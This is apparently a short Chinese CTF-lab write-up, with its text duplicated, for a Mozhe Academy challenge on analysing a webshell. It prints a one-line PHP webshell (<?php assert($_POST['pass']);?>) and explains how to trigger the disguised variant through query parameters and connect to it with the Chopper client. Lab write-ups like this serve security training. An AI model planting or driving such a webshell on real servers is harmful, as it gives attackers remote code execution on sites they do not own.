墨者学院 - WebShell代码分析溯源(第1题)
下载源码
使用seay源代码审计系统扫一扫
看到源码
典型变形一句话木马,需要构造为<?php assert($_POST['pass']);?>
则get传入“POST=assert”,POST传入密码“GET”
构造如下:http://xxxx/www/cn-right.php?POST=assert 密码为 GET
然后在菜刀连接的时候,在路径后面加上?POST=assert
密码是GET
然后寻找目标文件就ok
下载源码
使用seay源代码审计系统扫一扫
看到源码
典型变形一句话木马,需要构造为<?php assert($_POST['pass']);?>
则get传入“POST=assert”,POST传入密码“GET”
构造如下:http://xxxx/www/cn-right.php?POST=assert 密码为 GET
然后在菜刀连接的时候,在路径后面加上?POST=assert
密码是GET
然后寻找目标文件就ok
浙公网安备 33010602011771号